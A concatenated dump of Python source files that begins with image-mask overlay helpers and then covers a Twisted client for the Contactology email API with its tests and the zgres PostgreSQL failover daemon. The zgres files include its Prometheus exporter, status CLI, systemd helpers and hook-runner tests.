foreground = im_overlay*alpha + np.ones(im_overlay.shape)*(1-alpha) * np.array(rgb, dtype=np.uint8)[None, None, :]
binary_mask = mask == 1
# Compose image
im_overlay[binary_mask] = foreground[binary_mask]
contours = binary_dilation(binary_mask) ^ binary_mask
im_overlay[contours, :] = 0
return im_overlay.astype(image.dtype)
def checkerboard(img_size, block_size):
width = int(np.maximum( np.ceil(img_size[0] / block_size), np.ceil(img_size[1] / block_size)))
b = np.zeros((block_size, block_size), dtype=np.uint8) + 32
w = np.zeros((block_size, block_size), dtype=np.uint8) + 255 - 32
row1 = np.hstack([w,b]*width)
row2 = np.hstack([b,w]*width)
board = np.vstack([row1,row2]*width)
board = np.stack([board, board, board], axis=2)
return board[:img_size[0], :img_size[1], :]
BIG_BOARD = checkerboard([1000, 1000], 20)
def overlay_checker(image,mask):
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
object_ids = np.unique(mask)
# board = checkerboard(image.shape[:2], block_size=20)
board = BIG_BOARD[:im_overlay.shape[0], :im_overlay.shape[1], :].copy()
binary_mask = (mask == 1)
# Compose image
board[binary_mask] = im_overlay[binary_mask]
return board.astype(image.dtype)
def overlay_color(image,mask, rgb=[255,255,255]):
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
object_ids = np.unique(mask)
board = np.ones(image.shape, dtype=np.uint8) * np.array(rgb, dtype=np.uint8)[None, None, :]
binary_mask = (mask == 1)
# Compose image
board[binary_mask] = im_overlay[binary_mask]
return board.astype(image.dtype)
def overlay_bin(image,mask, rgb=[0,0,0]):
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
object_ids = np.unique(mask)
board = np.ones(image.shape, dtype=np.uint8) * np.array(rgb, dtype=np.uint8)[None, None, :]
binary_mask = (mask == 1)
# Compose image
board[binary_mask] = [255,255,255]
return board.astype(image.dtype)
def overlay_fade(image, mask):
from scipy.ndimage.morphology import binary_erosion, binary_dilation
im_overlay = image.copy()
# Overlay color on binary mask
binary_mask = mask == 1
not_mask = mask != 1
# Compose image
im_overlay[not_mask] = 0.4 * im_overlay[not_mask]
contours = binary_dilation(binary_mask) ^ binary_mask
im_overlay[contours, 0] = 0
im_overlay[contours, 1] = 255
im_overlay[contours, 2] = 255
return im_overlay.astype(image.dtype)
``` |
{
"source": "jinty/van.contactology",
"score": 2
} |
#### File: van/contactology/__init__.py
```python
from __future__ import print_function
import six
from six.moves.urllib.parse import urlencode
from pprint import pformat
import json
from twisted.web.client import getPage
from twisted.internet import defer
from twisted.python import log
__version__ = "3.0"
class APIError(Exception):
"""Base class for all api errors from contactology"""
def __init__(self, code, message):
self.code = code
self.message = message
super(APIError, self).__init__("API Error: %s (%s)" % (message, code))
class Contactology(object):
"""Proxy object"""
host = "api.emailcampaigns.net"
path = "/2/REST/"
_logio = False
def __init__(self, key, useHTTPS=True):
self.key = key
self.useHTTPS = useHTTPS
def _log_query(self, method, r):
log.msg("SENT: %s: %s" % (method, pformat(r)))
return r
def __getattr__(self, name):
def call_wrapper(**args):
return self._call(name, **args)
return call_wrapper
@defer.inlineCallbacks
def _call(self, method, **kw):
if self._logio:
self._log_query(method, kw)
# serialize non-strings using json
for k, v in list(kw.items()):
if six.PY2 and isinstance(v, six.text_type):
v = v.encode('utf-8')
if not isinstance(v, str):
v = json.dumps(v)
kw[k] = v
# add our preset arguments
kw.update({'key': self.key, 'method': method})
# construct request data
postdata = urlencode(sorted(kw.items())).encode('utf-8')
schema = self.useHTTPS and 'https' or 'http'
url = '%s://%s%s' % (schema, self.host, self.path)
url = url.encode('utf-8')
headers = {b"Content-type": b"application/x-www-form-urlencoded",
b"User-Agent": b"Twisted Wrapper %s" % str(__version__).encode('utf-8')}
resp = yield getPage(url, method=b'POST', headers=headers, postdata=postdata)
# de-serialize response
resp = json.loads(resp.decode('utf-8'))
if self._logio:
log.msg("RECEIVED: %s" % pformat(resp))
# check for errors
if isinstance(resp, dict):
if resp.get('result', None) == 'error':
raise APIError(resp['code'], resp['message'])
yield defer.returnValue(resp)
if __name__ == '__main__':
from twisted.internet import reactor
from pprint import pprint
proxy = Contactology('Your API key here')
@defer.inlineCallbacks
def test():
try:
resp = yield proxy.List_Get_Active_Lists()
print(resp)
resp = yield proxy.List_Get_Active_Lists(optionalParameters={'offset': 1})
print(resp)
resp = yield proxy.List_Get_Info(listId=1)
print(resp)
finally:
reactor.stop()
reactor.callWhenRunning(test)
reactor.run()
```
#### File: contactology/tests/test_contactology.py
```python
import unittest
from cgi import parse_qsl
from twisted.trial.unittest import TestCase
from twisted.internet import defer
from mock import patch, Mock
from van.contactology import Contactology, APIError, __version__
try:
from json import dumps
except ImportError:
from simplejson import dumps
def _parse_post(callargs):
return sorted(parse_qsl(callargs['postdata'].decode('utf-8'), True, True))
class TestProxy(TestCase):
@defer.inlineCallbacks
def _call_once(self, api_key, result, method, *args, **kw):
patcher = patch('van.contactology.getPage')
getPage = patcher.start()
try:
getPage.return_value = dumps(result).encode('ascii')
proxy = Contactology(api_key)
method = getattr(proxy, method)
out = yield method(*args, **kw)
finally:
patcher.stop()
defer.returnValue((getPage, out))
@defer.inlineCallbacks
def test_list_return(self):
getPage, out = yield self._call_once('API Key', [], 'Campaign_Find')
self.assertEquals(out, [])
@defer.inlineCallbacks
def test_call_args(self):
getPage, out = yield self._call_once('API Key', [], 'Campaign_Find')
self.assertEquals(getPage.call_count, 1)
self.assertEquals(getPage.call_args, ((b'https://api.emailcampaigns.net/2/REST/',),
{'headers': {b'Content-type': b'application/x-www-form-urlencoded',
b'User-Agent': b'Twisted Wrapper %s' % str(__version__).encode('ascii')},
'method': b'POST',
'postdata': b'key=API+Key&method=Campaign_Find'}))
@defer.inlineCallbacks
def test_api_error(self):
d = self._call_once('API Key', {'code': 221, 'message': 'Key not found', 'result': 'error'}, 'List_Get_Active_Lists')
yield self.failUnlessFailure(d, APIError)
@defer.inlineCallbacks
def test_unicode_api_key(self):
getPage, out = yield self._call_once(u'unicode API Key', [], 'Campaign_Find')
self.assertEquals(getPage.call_args[1]['postdata'], b'key=unicode+API+Key&method=Campaign_Find')
@defer.inlineCallbacks
def test_unicode_argument(self):
getPage, out = yield self._call_once('API Key', [], 'Contact_Get', email=u"[email protected]")
self.assertEquals(_parse_post(getPage.call_args[1]), [('email', '[email protected]'), ('key', 'API Key'), ('method', 'Contact_Get')])
``` |
{
"source": "jinty/zgres",
"score": 2
} |
#### File: zgres/zgres/deadman.py
```python
import sys
import itertools
import time
import uuid
from copy import deepcopy
import asyncio
import logging
import argparse
import zgres.plugin
from zgres.plugin import hookspec
import zgres.config
from zgres import utils
_missing = object()
@hookspec
def initialize():
"""Run any initialization code plugins need. Allways called first.
Return value ignored"""
pass
@hookspec(firstresult=True)
def get_my_id():
"""Get the id of this postgresql cluster"""
pass
@hookspec
def notify_state(state):
"""subscribe to changes in cluster state"""
pass
@hookspec
def notify_conn_info(conn_info):
# subscribe to changes in cluster connection info
pass
@hookspec
def master_lock_changed(owner):
# subscribe to changes in cluster master
pass
@hookspec
def veto_takeover(state):
# passed the state just before state is updated in the DCS, return True if we are not willing to takeover. This will result in the "willing" key in the state being None. The veto should only take into account values in the passed state object.
pass
@hookspec(firstresult=True)
def best_replicas(states):
# passed an iterator of the "willing" replicas (i.e. replicas with a non-null "willing" value in the state of sufficient age) and returns an iterator of the "best" replicas for failover
pass
@hookspec
def dcs_set_database_identifier(database_id):
pass
@hookspec(firstresult=True)
def dcs_get_database_identifier():
pass
@hookspec
def dcs_set_timeline(timeline):
pass
@hookspec(firstresult=True)
def dcs_get_timeline():
pass
@hookspec(firstresult=True)
def dcs_lock(name):
"""Get a named lock in the DCS"""
pass
@hookspec
def dcs_unlock(name):
pass
@hookspec(firstresult=True)
def dcs_get_lock_owner(name):
pass
@hookspec
def dcs_watch(master_lock, state, conn_info):
pass
@hookspec
def dcs_set_state(state):
pass
@hookspec(firstresult=True)
def dcs_list_state():
pass
@hookspec
def dcs_delete_conn_info():
pass
@hookspec
def dcs_set_conn_info(conn_info):
pass
@hookspec(firstresult=True)
def dcs_list_conn_info():
pass
@hookspec
def dcs_disconnect():
pass
######### Dealing with the local postgresql cluster
# return a dict with the connection info
@hookspec(firstresult=True)
def pg_connect_info():
pass
@hookspec(firstresult=True)
def pg_get_database_identifier():
pass
@hookspec(firstresult=True)
def pg_get_timeline():
pass
# stop postgresql if it is not already stopped
@hookspec
def pg_stop():
pass
# start postgresql if it is not already running
@hookspec
def pg_start():
pass
@hookspec
def pg_reload():
pass
@hookspec
def pg_restart():
pass
# halt: should prevent the existing database from running again.
# either stop the whole machine, move data directory aside, pg_rewind or prepare for re-bootstrapping as a slave
@hookspec
def pg_reset():
pass
# create a new postgresql database
@hookspec
def pg_initdb():
pass
@hookspec
def pg_stop_replication():
pass
@hookspec
def pg_setup_replication(primary_conninfo):
pass
# create a backup and put it where replicas can get it
@hookspec
def pg_backup():
pass
@hookspec
def pg_restore():
pass
# returns one of: None, 'master', 'replica'
@hookspec(firstresult=True)
def pg_replication_role():
pass
# monitoring
@hookspec
def start_monitoring():
pass
@hookspec
def get_conn_info():
"""extra keys for "conn" information provided by plugins
at least one plugin must provide this so that application servers can connect
"""
pass
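# Illustrative sketch (not part of zgres itself): a deadman plugin is constructed
# with (name, app) and implements whichever of the hookspecs above match its role,
# as plain methods with the same names. A minimal id/conn-info plugin could look
# roughly like:
#
#   class MyInfoPlugin:
#       def __init__(self, name, app):
#           self.app = app
#       def initialize(self):
#           pass
#       def get_my_id(self):
#           return 'server-1'               # hypothetical id
#       def get_conn_info(self):
#           return {'host': '10.0.0.5'}     # hypothetical address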
def willing_replicas(states):
for id, state in states:
if state.get('willing', None) is None:
continue
if state['willing'] + 600 < time.time():
yield id, state
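# Example (illustrative): with time.time() == 10000, only replicas whose 'willing'
# timestamp is set and older than 600 seconds are yielded:
#   list(willing_replicas([('a', {'willing': 9000}),   # yielded, willing for 1000s
#                          ('b', {'willing': 9900}),   # skipped, too recent
#                          ('c', {'willing': None})])) # skipped, not willing
#   -> [('a', {'willing': 9000})]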
def _assert_all_true(item, msg):
if not _is_all_true(item):
raise AssertionError(msg)
def _is_all_true(item):
"""Has at least one result and nothing that is false"""
non_true = [i for i in item if not i]
if not item or non_true:
return False
return True
class App:
_giveup_lock = asyncio.Lock()
my_id = None
config = None
database_identifier = None
tick_time = None
_exit_code = 0
_master_lock_owner = None
def __init__(self, config):
self.health_problems = {}
self._state = {}
self.config = config
self.tick_time = config['deadman'].get('tick_time', 2) # float seconds to scale all timeouts
self._conn_info = {} # TODO: populate from config file
self._setup_plugins()
self.logger = logging.getLogger('zgres')
@property
def replication_role(self):
return self._state.get('replication_role', None)
@property
def have_master_lock(self):
return self._master_lock_owner == self.my_id
def _setup_plugins(self):
self._pm = zgres.plugin.setup_plugins(
self.config,
'deadman',
sys.modules[__name__],
self)
self._plugins = self._pm.hook
def follow(self, primary_conninfo):
# Change who we are replicating from
self.logger.info('Now replicating from {}'.format(primary_conninfo))
assert self._plugins.pg_replication_role() != 'master'
self._plugins.pg_setup_replication(primary_conninfo=primary_conninfo)
self._plugins.pg_restart()
def replica_bootstrap(self):
self._plugins.pg_stop()
# some restore methods only restore data, not config files, so let's init first
self._plugins.pg_initdb()
try:
self._plugins.pg_restore()
except Exception:
# try to make sure we don't restore a master by mistake
self._plugins.pg_reset()
raise
self._plugins.pg_setup_replication(primary_conninfo=None)
my_database_id = self._plugins.pg_get_database_identifier()
if self._plugins.pg_replication_role() != 'replica' or my_database_id != self.database_identifier:
# destroy our current cluster
self._plugins.pg_reset()
self.logger.error("Something is seriously wrong: after restoring postgresql was NOT setup as a replica.")
return 5
return 0
def master_bootstrap(self):
# Bootstrap the master, make sure that the master can be
# backed up and started before we set the database id
self.logger.info('Initializing master DB')
self._plugins.pg_initdb()
self._plugins.pg_start()
database_id = self._plugins.pg_get_database_identifier()
self.logger.info('Initializing done, master database identifier: {}'.format(database_id))
if self._plugins.dcs_lock(name='database_identifier'):
self.logger.info('Got database identifier lock')
if self._plugins.dcs_get_database_identifier() is not None:
self.logger.info('Database identifier already set, restarting to become replica')
return 0
self.logger.info('No database identifier yet, performing first backup')
self.database_identifier = database_id
self._plugins.pg_backup()
r = self._plugins.dcs_set_database_identifier(database_id=database_id)
_assert_all_true(r, 'Something is VERY badly wrong.... this should never happen....')
self.logger.info('Successfully bootstrapped master and set database identifier: {}'.format(database_id))
return 0
self.logger.info('Could not set database identifier in DCS. maybe another master beat us? trying again')
return 5
def initialize(self):
"""Initialize the application
returns None if initialization was successful
or a number of seconds to wait before trying again to initialize
"""
self.unhealthy('zgres.initialize', 'Initializing')
self.logger.info('Initializing plugins')
self._plugins.initialize()
self.my_id = self._plugins.get_my_id()
self.logger.info('My ID is: {}'.format(self.my_id))
self.database_identifier = self._plugins.dcs_get_database_identifier()
if self.database_identifier is None:
self.logger.info('Could not find database identifier in DCS, bootstrapping master')
return self.master_bootstrap()
self.logger.info('Found database identifier in DCS: {}'.format(self.database_identifier))
my_database_id = self._plugins.pg_get_database_identifier()
if my_database_id != self.database_identifier:
self.logger.info('My database identifier is different ({}), bootstrapping as replica'.format(my_database_id))
return self.replica_bootstrap()
replication_role = self._plugins.pg_replication_role()
self.update_state(replication_role=replication_role)
if replication_role is None:
raise AssertionError('I should have a replication role already')
elif replication_role == 'replica':
self.logger.info('I am a replica, registering myself as such')
elif replication_role == 'master':
self.logger.info('I am NOT a replica, trying to take over as master')
if self._plugins.dcs_lock(name='master'):
self.logger.info('Got master lock, proceeding with startup')
else:
owner = self._plugins.dcs_get_lock_owner(name='master')
self.logger.info('Failed to get master lock ({} has it), checking if a new master is running yet'.format(owner))
self._plugins.pg_stop()
# XXX this is NOT true if our master was recovering while the other master started up
# hmm, wonder how we can do it properly? connect to the new master? firewalls?
# what state can we inspect?
my_timeline = self._plugins.pg_get_timeline()
existing_timeline = self._plugins.dcs_get_timeline()
if existing_timeline > my_timeline:
self.logger.info("a master has started while we didn't have the lock, resetting ourselves")
# we can't start again for risk of split brain
self._plugins.pg_reset()
else:
self.logger.info('I could not get the master lock, but the master has not started up yet. (new master not functioning?) will try again in a bit')
return 5
self.logger.info('Making sure postgresql is running')
self._plugins.pg_start()
self.logger.info('Starting monitors')
self._plugins.start_monitoring()
self.logger.info('Starting to watch the DCS for events')
self._plugins.dcs_watch(
master_lock=self.master_lock_changed,
state=self._notify_state,
conn_info=self._notify_conn_info)
self._get_conn_info_from_plugins()
self.healthy('zgres.initialize')
if self.health_problems:
if replication_role == 'master':
# I am an unhealthy master with the lock,
# This is a weird situation because another master should have taken over before
# we restarted and got the lock. let's check in a little while if we become healthy,
# else try failover again
loop = asyncio.get_event_loop()
loop.call_later(300 * self.tick_time, loop.create_task, self._handle_unhealthy_master())
return None
def _get_conn_info_from_plugins(self):
sources = dict((k, None) for k in self._conn_info)
for info in self._plugins.get_conn_info():
for k, v in info.items():
source = sources.get(k, _missing)
if source is None:
self.logger.info('plugin overriding connection info for {} set in config file, set to: {}'.format(k, v))
elif source is not _missing:
self.logger.info('plugin overriding connection info for {} set by another plugin ({}), set to: {}'.format(k, source, v))
sources[k] = 'plugin_name'
self._conn_info[k] = v
self._state.update(deepcopy(self._conn_info))
def update_state(self, **kw):
changed = False
for k, v in kw.items():
if k in ['willing']:
self.logger.warn('Cannot set state for {}={}, key {} is automatically set'.format(k, v, k))
continue
if k in self._conn_info:
self.logger.warn('Cannot set state for {}={}, key {} has already been set in the connection info'.format(k, v, k))
continue
v = deepcopy(v) # for reliable change detection on mutable args
existing = self._state.get(k, _missing)
if v != existing:
changed = True
self._state[k] = v
if changed:
changed = self._update_auto_state() or changed
if changed and 'zgres.initialize' not in self.health_problems:
# don't update state in the DCS till we are finished updating
self._plugins.dcs_set_state(state=self._state.copy())
def _update_auto_state(self):
"""Update any keys in state which the deadman App itself calculates"""
state = self._state
willing = True
changed = False
if state.get('health_problems', True):
willing = False
if state.get('replication_role', None) != 'replica':
willing = False
if willing:
for vetoed in self._plugins.veto_takeover(state=deepcopy(self._state)):
if vetoed:
willing = False
if willing and state.get('willing', None) is None:
state['willing'] = time.time()
changed = True
elif not willing and state.get('willing', None) is not None:
state['willing'] = None
changed = True
return changed
def _update_timeline(self):
my_timeline = self._plugins.pg_get_timeline()
self._plugins.dcs_set_timeline(timeline=my_timeline)
def master_lock_changed(self, owner):
"""Respond to a change in the master lock.
At least one plugin must call this callback when the master lock
changes. This method should also be called at least once on startup
with the current master.
"""
self._master_lock_owner = owner
if owner == self.my_id:
# I have the master lock, if I am replicating, stop.
if self._plugins.pg_replication_role() == 'replica':
self.update_state(replication_role='taking-over')
self._plugins.pg_stop_replication()
new_role = self._plugins.pg_replication_role()
if new_role != 'master':
raise Exception('I should have become a master already!')
self._update_timeline()
self.update_state(replication_role=new_role)
else:
if self._plugins.pg_replication_role() == 'master':
# if I am master, but I am not replicating, shut down
self.restart(10)
if owner is None:
# No-one has the master lock, try take over
loop = asyncio.get_event_loop()
loop.call_soon(loop.create_task, self._try_takeover())
self._plugins.master_lock_changed(owner=owner)
def _notify_state(self, state):
self._plugins.notify_state(state=state)
def _notify_conn_info(self, conn_info):
self._plugins.notify_conn_info(conn_info=conn_info)
def _willing_replicas(self):
return willing_replicas(self._plugins.dcs_list_state())
def _am_i_best_replica(self):
# Check how I am doing compared to my brethern
better = []
willing_replicas = list(self._willing_replicas()) # list() for easer testing
for id, state in self._plugins.best_replicas(states=willing_replicas):
if id == self.my_id:
return True
better.append((id, state))
self.logger.info('Abstaining from leader election as I am not among the best replicas: {}'.format(better))
return False
async def _async_sleep(self, delay):
await asyncio.sleep(delay * self.tick_time)
def _sleep(self, delay):
# blocking sleep
time.sleep(delay * self.tick_time)
async def _try_takeover(self):
while True:
self.logger.info('Sleeping a little to allow state to be updated in the DCS before trying to take over')
await self._async_sleep(3) # let replicas update their state
# The master is still missing and we should decide if we must take over
if self._master_lock_owner is not None:
self.logger.info('There is a new master: {}, stop trying to take over'.format(self._master_lock_owner))
break
if self._am_i_best_replica():
# try to get the master lock; if this succeeds, master_lock_changed will be called again
# and will bring us out of replication
self.logger.info('I am one of the best, trying to get the master lock')
if not self._plugins.dcs_lock(name='master'):
continue
else:
self.logger.info('I am not yet the best replica, giving the others a chance')
def unhealthy(self, key, reason, can_be_replica=False):
"""Plugins call this if they want to declare the instance unhealthy.
If an instance is unhealthy, but can continue to serve as a replica, set can_be_replica=True
"""
self.health_problems[key] = dict(reason=reason, can_be_replica=can_be_replica)
self.update_state(health_problems=self.health_problems)
if 'zgres.initialize' in self.health_problems:
return
self.logger.warn('I am unhealthy: ({}) {}'.format(key, reason))
if self._plugins.pg_replication_role() == 'replica':
if not can_be_replica:
self._plugins.dcs_delete_conn_info()
else:
self._plugins.dcs_delete_conn_info()
loop = asyncio.get_event_loop()
loop.call_soon(loop.create_task, self._handle_unhealthy_master())
async def _handle_unhealthy_master(self):
if self._giveup_lock.locked():
return # already trying
async with self._giveup_lock:
while self.health_problems:
for i in self._willing_replicas():
# there is at least one willing replica
# give it a chance to take over by giving up
# the lock
self.restart(120)
await self._async_sleep(30)
def healthy(self, key):
"""Plugins call this if they want to declare the instance unhealthy"""
reason = self.health_problems.pop(key, _missing)
if reason is _missing:
return # no-op, we were already healthy
self.update_state(health_problems=self.health_problems)
self.logger.warn('Stopped being unhealthy for this reason: ({}) {}'.format(key, reason))
if self.health_problems:
self.logger.warn('I am still unhealthy for these reasons: {}'.format(self.health_problems))
else:
# YAY, we're healthy again
if self._plugins.pg_replication_role() == 'master':
locked = self._plugins.dcs_lock(name='master')
if not locked:
# for some reason we cannot lock the master, restart and try again
self.restart(60) # restart and try to take the lock again later
self._set_conn_info()
def _set_conn_info(self):
self._plugins.dcs_set_conn_info(conn_info=self._conn_info)
def run(self):
loop = asyncio.get_event_loop()
self.logger.info('Starting')
timeout = self.initialize()
if timeout is not None:
self.restart(timeout)
# Finished initialization without issue, start up the event loop
loop.set_exception_handler(self._handle_exception)
loop.run_forever()
return self._exit_code
def _handle_exception(self, loop, context):
loop.default_exception_handler(context)
self.logger.error('Unexpected exception, exiting...')
self._exit_code = 1
loop.call_soon(self.restart, 10)
def _stop(self):
# for testing
loop = asyncio.get_event_loop()
loop.stop()
def restart(self, timeout):
self.logger.warn('Shutting Down')
# If we are master, our priority is to stop
# postgresql to avoid a split brain
if self._plugins.pg_replication_role() == 'master':
self.logger.warn('We are master, stopping PostgreSQL')
self._plugins.pg_stop()
# we tell asyncio to stop here so even if the following code errors,
# we will still terminate the process but we do want to be sure
# that postgres is stopped on master before we do that
self.logger.warn('Telling asyncio to stop')
self._stop()
# TODO: deal with very long timeouts/hangs in the following code here
# perhaps spawn a thread to kill -9 ourselves?
# now we try clean up gracefully
self.logger.warn('disconnecting DCS')
self._plugins.dcs_disconnect()
if timeout:
self.logger.warn('sleeping for {} ticks, then restarting'.format(timeout))
self._sleep(timeout) # yes, this blocks everything. that's the point of it!
self.logger.warn('Finished Shut Down')
def pg_connect_info(self):
# expose pg_connect for other plugins to use
return self._plugins.pg_connect_info()
#
# Command Line Scripts
#
def deadman_cli(argv=sys.argv):
parser = argparse.ArgumentParser(description="""Monitors/controls the local postgresql installation.
This daemon will do these things:
- Register the local postgresql instance with Zookeeper by creating a file
named the IP address to connect on.
- Try to become master by creating the file:
master-{cluster_name}
in zookeeper. If we succeed we create the file /tmp/zgres_become_master.
- Shutdown postgres temporarily if we are master and the zookeeper connection is lost.
- Shutdown postgres permanently if master-{cluster_name} already exists and we didn't create it
(split-brain avoidance)
- Monitor the local postgresql installation, if it becomes unavailable,
withdraw our zookeeper registrations.
It does not:
- maintain streaming replication (use zgres-apply hooks for that)
- do remastering (assumed to have happened before we start)
""")
config = zgres.config.parse_args(parser, argv, config_file='deadman.ini')
if 'connection_string' not in config['zookeeper']:
print('EXITING in 60 seconds: must configure zgres-deadman with a zookeeper connection string to start')
time.sleep(60)
sys.exit(0)
app = App(config)
sys.exit(app.run())
```
#### File: zgres/zgres/prometheus.py
```python
import sys
import logging
import argparse
from time import sleep
from prometheus_client import Gauge, start_http_server
from .config import parse_args
from .deadman import App, willing_replicas
metric_dcs_has_conn_info = Gauge('zgres_dcs_has_conn_info', '1 if the server is "connectable" i.e. has conn_info in the DCS, else 0')
metric_dcs_is_willing_replica = Gauge('zgres_is_willing_replica', '1 if the server is "willing_to_take_over" from the master, else 0')
metric_dcs_is_master = Gauge('zgres_is_master', '1 if the server is the current master, else 0')
metric_dcs_willing_since = Gauge('zgres_willing_since', 'Timestamp since which this server has been willing to take over')
def deadman_exporter(argv=sys.argv):
"""This daemon monitors the local zgres-deadman daemon running on this machine.
It works by using the deadman configuration to look into the DCS to find
statistics for this machine. We build it as a separate daemon to lessen the
risk that monitoring and statistics collection inside the zgres-deadman
will cause errors.
We run it on the same machine as this provides:
* reusability of the existing deadman configuration
* easier prometheus configuration
* automatic HA
"""
parser = argparse.ArgumentParser(description="Prometheus statistics daemon for zgres-deadman")
config = parse_args(parser, argv, config_file='deadman.ini')
# this sleep prevents us from restarting too fast and systemd failing to restart us
# we use a fail-always architecture here, any exception causes a daemon restart
sleep(10)
start_http_server(9163)
# use only one plugin and zookeeper connection, otherwise we get memory leaks :(
plugins = App(config)._plugins
plugins.initialize()
while True:
dcs_has_conn_info = 0
dcs_is_willing_replica = 0
# HACK, we only need the plugins, really
all_state = list(plugins.dcs_list_state())
my_id = plugins.get_my_id()
for id, state in all_state:
if id == my_id:
if 'master' == state.get('replication_role'):
metric_dcs_is_master.set(1)
else:
metric_dcs_is_master.set(0)
break
for id, state in willing_replicas(all_state):
if id == my_id:
dcs_is_willing_replica = 1
metric_dcs_willing_since.set(state['willing'])
break
for id, conn_info in plugins.dcs_list_conn_info():
if id == my_id:
dcs_has_conn_info = 1
break
metric_dcs_has_conn_info.set(dcs_has_conn_info)
metric_dcs_is_willing_replica.set(dcs_is_willing_replica)
sleep(60)
if __name__ == '__main__':
deadman_exporter()
```
#### File: zgres/zgres/show.py
```python
import sys
import argparse
from pprint import pformat, pprint
from .config import parse_args
from .deadman import App, willing_replicas
def indented_pprint(obj):
lines = []
for line in pformat(obj).splitlines(True):
lines.append(' ')
lines.append(line)
print(''.join(lines))
def show_cli(argv=sys.argv):
parser = argparse.ArgumentParser(description="Show zgres info")
config = parse_args(parser, argv, config_file='deadman.ini')
if config.has_section('deadman') and config['deadman'].get('plugins', '').strip():
plugins = App(config)._plugins
plugins.initialize()
all_state = list(plugins.dcs_list_state())
my_id = plugins.get_my_id()
my_state = None
for id, state in all_state:
if id == my_id:
my_state = state
break
# if deadman is configured show information about its state
# HACK, we only need the plugins, really
print('My State:')
print(' ID: {}'.format(my_id))
if my_state is None:
role = 'not registered in zookeeper'
else:
role = my_state.get('replication_role')
print(' Replication role: {}'.format(role))
print('Cluster:')
print(' current master: {}'.format(plugins.dcs_get_lock_owner(name='master')))
print(' database identifier: {}'.format(plugins.dcs_get_database_identifier()))
print(' timeline: {}'.format(pformat(plugins.dcs_get_timeline())))
# willing_replicas is removed!
willing = list(willing_replicas(all_state))
print('\nwilling replicas:')
indented_pprint(willing)
best_replicas = list(plugins.best_replicas(states=willing))
print('\nbest replicas:')
indented_pprint(best_replicas)
print('\nall conn info:')
indented_pprint(list(plugins.dcs_list_conn_info()))
print('\nall state:')
indented_pprint(all_state)
```
#### File: zgres/zgres/systemd.py
```python
import os
from subprocess import check_call, call
def write_service(service_name, contents):
"""Write a service file in a "safe" manner.
If the contents of the file are the same as what is desired to be written,
do nothing.
First writes to a temporary file in the same directory as the target, then
move that temporary file into place.
Return a boolean True if the file was changed else False
"""
assert '/' not in service_name
path = '/lib/systemd/system/' + service_name
if os.path.exists(path):
with open(path, 'r') as f:
existing = f.read()
if existing == contents:
return False
tmppath = '/lib/systemd/system/.' + service_name + '.tmp'
with open(tmppath, 'w') as f:
f.write(contents)
os.rename(tmppath, path)
return True
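# Usage sketch (the unit name and content are hypothetical):
#   changed = write_service('zgres-deadman.service', unit_text)
#   assert_enabled_and_running('zgres-deadman.service', reload_daemon=changed, restart=changed)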
def assert_enabled_and_running(service_name, reload=False, reload_daemon=False, restart=False):
check_call(['systemctl', 'enable', service_name])
if reload_daemon:
check_call(['systemctl', 'daemon-reload'])
check_call(['systemctl', 'start', service_name]) # do we need to check status?
if reload:
check_call(['systemctl', 'reload', service_name]) # maybe avoid if we just started the service
if restart:
check_call(['systemctl', 'restart', service_name]) # maybe avoid if we just started the service
def assert_disabled_and_stopped(service_name):
check_call(['systemctl', 'disable', service_name])
call(['systemctl', 'stop', service_name]) # fails if service does not exist
```
#### File: zgres/tests/test_apply.py
```python
import os
import tempfile
import shutil
from unittest import TestCase, mock
_marker = object()
class Test_main(TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
self.hooks = os.path.join(self.tmpdir, 'hooks')
os.makedirs(self.hooks)
self.config = os.path.join(self.tmpdir, 'config')
os.makedirs(self.config)
self._run_one_hook_patcher = mock.patch('zgres.apply._run_one_hook')
self.run_one_hook = self._run_one_hook_patcher.start()
self.hook_results = []
self.run_one_hook.side_effect = self.pop_hook_result
def pop_hook_result(self, hook, path):
res = self.hook_results.pop(0)
if isinstance(res, Exception):
raise res
return res
def tearDown(self):
assert not self.hook_results
self._run_one_hook_patcher.stop()
shutil.rmtree(self.tmpdir)
def apply(self):
from zgres.apply import _apply
return _apply(self.tmpdir)
def make_hook(self, filename='10-myhook', for_config='config.json', executable=True):
file = os.path.join(self.hooks, filename)
assert not os.path.exists(file)
with open(file, 'w') as f:
f.write('ignored, use mock to simulate running this file')
if executable:
os.chmod(file, 0o700)
return file
def make_config(self, filename='config.json', data='{"MyKey": "MyValue"}'):
file = os.path.join(self.config, filename)
with open(file, 'w') as f:
f.write(data)
return file
def test_apply(self):
self.make_config()
retcode = self.apply()
self.assertEqual(retcode, 0)
def test_config(self):
from zgres.apply import Config
self.make_config(filename='myconfig.json', data='{"MyKey": "MyValue"}')
proxy = Config(self.config)
self.assertEqual(proxy.get('somename'), None)
self.assertEqual(proxy['myconfig.json'], {"MyKey": "MyValue"})
def test_a_hook(self):
config = self.make_config()
hookfile = self.make_hook()
self.hook_results.append(0)
self.apply()
self.run_one_hook.assert_called_once_with(hookfile, self.config)
def test_ignore_hidden_hook(self):
config = self.make_config()
hookfile = self.make_hook()
hidden_hook = self.make_hook(filename='.myhook')
self.hook_results.append(0)
self.apply()
self.run_one_hook.assert_called_once_with(hookfile, self.config)
def test_a_hook_order(self):
config = self.make_config()
hook1 = self.make_hook(filename='1hook')
hook3 = self.make_hook(filename='3hook')
hook2 = self.make_hook(filename='2hook')
hook10 = self.make_hook(filename='10hook')
self.hook_results.extend([0, 0, 0, 0])
self.apply()
self.assertEqual(
self.run_one_hook.call_args_list,
[mock.call(hook10, self.config),
mock.call(hook1, self.config),
mock.call(hook2, self.config),
mock.call(hook3, self.config),
])
def test_hook_failure(self):
config = self.make_config()
hook1 = self.make_hook(filename='1hook')
hook2 = self.make_hook(filename='2hook')
hook3 = self.make_hook(filename='3hook')
self.hook_results.extend([0, 1, 0]) # second hook fails
# the process must return a non-zero exit code
self.assertEqual(self.apply(), 1)
# and only the first 2 hooks were run
self.assertEqual(
self.run_one_hook.call_args_list,
[mock.call(hook1, self.config),
mock.call(hook2, self.config),
mock.call(hook3, self.config),
])
def test_non_executable_hook(self):
config = self.make_config()
hook1 = self.make_hook(filename='1hook')
hook2 = self.make_hook(filename='2hook', executable=False)
hook3 = self.make_hook(filename='3hook')
self.hook_results.extend([0, 0])
self.apply()
# 2hook is skipped
self.assertEqual(
self.run_one_hook.call_args_list,
[mock.call(hook1, self.config),
mock.call(hook3, self.config),
])
```
